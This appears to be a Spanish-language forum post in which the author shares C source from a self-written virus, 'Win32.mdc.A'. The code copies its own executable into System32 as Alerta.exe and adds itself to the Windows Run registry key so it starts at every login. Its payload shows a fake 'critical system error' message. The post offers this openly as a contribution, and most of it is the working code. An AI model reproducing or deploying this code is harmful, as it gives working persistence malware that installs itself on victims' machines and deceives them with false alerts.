Un payload de Win32.mdc.A

Ahi dejo un codigo, que escribi hace tiempecito, bueno lo que hace es sencillo, y lo use en un bichito que se llamo Win32.mdc.A lo hice hace meses, no era muy grande, solo residia en el PC, se inciaba junto con el sistema y se copiaba en diskettes de 3 1/2, nunca salio de mi computadora. hasta que perdi toda mi información y esto fue parte de las cosas que he logrado recuperar.


Este code lo que hace es tomar el path de System32 y se copia ahi se inicia a cada incio de sesion del sistema y como payload muestra un mensaje de alerta.

// Mensaje de alerta critca con API MessageBoxA
// http://whmd.blogspot.com
// http://ethical-security.co.cc
// http://bugdox.org

#include <windows.h>
#include <string.h>

char windir[MAX_PATH];

int APIENTRY WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
 char pathname[256];
 GetWindowsDirectory(windir, sizeof(windir));
 HMODULE hMe = GetModuleHandle(NULL);
 DWORD nRet = GetModuleFileName(hMe, pathname, 256);
 HKEY hKey;
 strcat(windir, "\\System32\\Alerta.exe");
 CopyFile(pathname, windir, 0);

 RegCreateKey (HKEY_CURRENT_USER, "Software\\z1z30f", &hKey);
 RegSetValueEx (hKey, "Alert", 0, REG_SZ, (LPBYTE) windir, sizeof(windir));


 MessageBox (0, "Error critico del sistema", "Fatal error...", MB_ICONERROR | MB_OK); // Mensjae critico

 RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey);
 RegSetValueEx (hKey, "Alert", 0, REG_SZ, (LPBYTE)windir, sizeof(windir));
 return 0;
}
 

Otros ejemplos:

MessageBox (0, "alerta de ayuda", "Error", MB_ICONQUESTION | MB_OK); // Ayuda
MessageBox (0, "alerta de advertencia", "Error", MB_ICONEXCLAMATION | MB_OK); // Advertencia

Aqui una lista de estilos
MB_ABORTRETRYIGNORE
MB_APPLMODAL
MB_DEFAULT_DESKTOP_ONLY
MB_HELP
MB_ICONASTERISK
MB_ICONERROR
MB_ICONEXCLAMATION
MB_ICONHAND
MB_ICONINFORMATION
MB_TASKMODAL


Como pueden ver no es gran cosa, pues ahi lo dejo como aporte.
Saludos.